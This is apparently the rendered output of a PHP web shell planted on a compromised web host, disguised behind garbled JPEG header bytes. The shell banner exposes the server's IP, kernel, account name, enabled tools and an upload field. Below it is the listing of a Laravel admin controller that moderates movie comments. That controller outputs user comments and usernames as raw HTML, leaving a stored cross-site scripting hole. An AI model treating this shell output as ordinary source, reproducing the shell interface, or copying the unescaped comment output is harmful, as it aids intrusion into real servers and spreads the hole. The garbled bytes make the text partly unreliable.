����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.144.85.96 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/gle.gltechlimited.com/app/Http/Controllers/ |
Upload File : |
<?php namespace App\Http\Controllers; use App\Movie; use App\MovieComment; use App\MovieSubcomment; use App\TvSeries; use App\User; use Illuminate\Http\Request; use Illuminate\Support\Facades\Validator; class AdminCommentController extends Controller { public function __construct() { $this->middleware('permission:comment-settings.comments', ['only' => ['index', 'destroy', 'bulk_delete']]); $this->middleware('permission:comment-settings.subcomments', ['only' => ['subcommentindex', 'subcommentdestroy', 'sub_bulk_delete']]); } public function index(Request $request) { $comment = MovieComment::get(); if ($request->ajax()) { return \Datatables::of($comment) ->addIndexColumn() ->addColumn('checkbox', function ($row) { $html = '<div class="inline"> <input type="checkbox" form="bulk_delete_form" class="filled-in material-checkbox-input" name="checked[]" value="' . $row->id . '" id="checkbox' . $row->id . '"> <label for="checkbox' . $row->id . '" class="material-checkbox"></label> </div>'; return $html; }) ->addColumn('username', function ($row) { return $row->name; }) ->addColumn('name', function ($row) { if ($row->movie_id != null) { $movie = Movie::find($row->movie_id); return $name = $movie->name; } else { $tv = Tvseries::find($row->tv_series_id); return $name = $tv->name; } }) ->addColumn('comment', function ($row) { return $row->comment; }) ->addColumn('status', function ($row) { if ($row->status == 1) { return "<a href=" . route('quick.comment.status', $row->id) . " class='badge badge-pill badge-success'>" . __('Approved') . "</a>"; } else { return "<a href=" . route('quick.comment.status', $row->id) . " class='badge badge-pill badge-danger'>" . __('Un Approved') . "</a>"; } }) ->addColumn('created_at', function ($row) { return date('F d, Y', strtotime($row->created_at)); }) ->addColumn('action', function ($row) { $btn = ' <div class="admin-table-action-block"> <button type="button" class="btn btn-round btn-outline-danger" data-target="#deleteModal' . $row->id . '"><i class="fa fa-trash"></i> </button></div>'; $btn .= '<div id="deleteModal' . $row->id . '" class="delete-modal modal fade" role="dialog"> <div class="modal-dialog modal-sm"> <!-- Modal content--> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal">×</button> <div class="delete-icon"></div> </div> <div class="modal-body text-center"> <h4 class="modal-heading">' . __('Are You Sure ?') . '</h4> <p>' . __('Do you really want to delete selected item names here? This process cannot be undone.') . '</p> </div> <div class="modal-footer"> <form method="POST" action="' . route("comments.destroy", $row->id) . '"> ' . method_field("DELETE") . ' ' . csrf_field() . ' <button type="reset" class="btn btn-gray translate-y-3" data-dismiss="modal">' . __('No') . '</button> <button type="submit" class="btn btn-danger">' . __('Yes') . '</button> </form> </div> </div> </div> </div>'; return $btn; }) ->rawColumns(['checkbox', 'username', 'name', 'comment', 'status', 'created_at', 'action']) ->make(true); } return view('admin.comment.index', compact('comment')); } public function destroy($id) { if (env('DEMO_LOCK') == 1) { return back()->with('deleted', __('This action is disabled in the demo !')); } $query = MovieComment::find($id); if (isset($query)) { $query->delete(); return back()->with('deleted', __('Comment has been deleted!')); } else { return back()->with('deleted', __('Comment not found!')); } } public function bulk_delete(Request $request) { if (env('DEMO_LOCK') == 1) { return back()->with('deleted', __('This action is disabled in the demo !')); } if (env('DEMO_LOCK') == 1) { return back()->with('deleted', __('This action is disabled in the demo !')); } $validator = Validator::make($request->all(), ['checked' => 'required']); if ($validator->fails()) { return back()->with('deleted', __('Please select one of them to delete')); } foreach ($request->checked as $checked) { $query = MovieComment::findOrFail($checked); if (isset($query->subcomment)) { foreach ($query->subcomment as $sub) { $sub->delete(); } } $query->delete(); } return back()->with('deleted',__('Comment has been deleted')); } public function subcommentindex(Request $request) { $subcomment = MovieSubcomment::get(); if ($request->ajax()) { return \Datatables::of($subcomment) ->addIndexColumn() ->addColumn('checkbox', function ($row) { $html = '<div class="inline"> <input type="checkbox" form="bulk_delete_form" class="filled-in material-checkbox-input" name="checked[]" value="' . $row->id . '" id="checkbox' . $row->id . '"> <label for="checkbox' . $row->id . '" class="material-checkbox"></label> </div>'; return $html; }) ->addColumn('username', function ($row) { $user = User::find($row->user_id); return $user->name; }) ->addColumn('comment', function ($row) { return $row->comment->comment; }) ->addColumn('reply', function ($row) { return $row->reply; }) ->addColumn('status', function ($row) { if ($row->status == 1) { return "<a href=" . route('quick.subcomment.status', $row->id) . " class='badge badge-pill badge-success'>" . __('Approved') . "</a>"; } else { return "<a href=" . route('quick.subcomment.status', $row->id) . " class='badge badge-pill badge-danger'>" . __('Un Approved') . "</a>"; } }) ->addColumn('created_at', function ($row) { return date('F d, Y', strtotime($row->created_at)); }) ->addColumn('action', function ($row) { $btn = ' <div class="admin-table-action-block"> <button type="button" class="btn btn-round btn-outline-danger data-target="#deleteModal' . $row->id . '"><i class="fa fa-trash"></i> </button></div>'; $btn .= '<div id="deleteModal' . $row->id . '" class="delete-modal modal fade" role="dialog"> <div class="modal-dialog modal-sm"> <!-- Modal content--> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal">×</button> <div class="delete-icon"></div> </div> <div class="modal-body text-center"> <h4 class="modal-heading">' . __('Are You Sure ?') . '</h4> <p>' . __('Do you really want to delete selected item names here? This process cannot be undone.') . '</p> </div> <div class="modal-footer"> <form method="POST" action="' . route("subcomments.destroy", $row->id) . '"> ' . method_field("DELETE") . ' ' . csrf_field() . ' <button type="reset" class="btn btn-gray translate-y-3" data-dismiss="modal">' . __('No') . '</button> <button type="submit" class="btn btn-danger">' . __('Yes') . '</button> </form> </div> </div> </div> </div>'; return $btn; }) ->rawColumns(['checkbox', 'username', 'comment', 'status', 'reply', 'created_at', 'action']) ->make(true); } return view('admin.comment.sub_index', compact('subcomment')); } public function subcommentdestroy($id) { if (env('DEMO_LOCK') == 1) { return back()->with('deleted', __('This action is disabled in the demo !')); } $query = MovieSubcomment::find($id); if (isset($query)) { $query->delete(); return back()->with('deleted', __('SubComment has been deleted!')); } else { return back()->with('deleted', __('SubComment not found!')); } } public function sub_bulk_delete(Request $request) { if (env('DEMO_LOCK') == 1) { return back()->with('deleted', __('This action is disabled in the demo !')); } $validator = Validator::make($request->all(), ['checked' => 'required']); if ($validator->fails()) { return back() ->with('deleted', __('Please select one of them to delete')); } foreach ($request->checked as $checked) { $query = MovieSubcomment::findOrFail($checked); $query->delete(); } return back()->with('deleted', __('SubComment has been deleted')); } }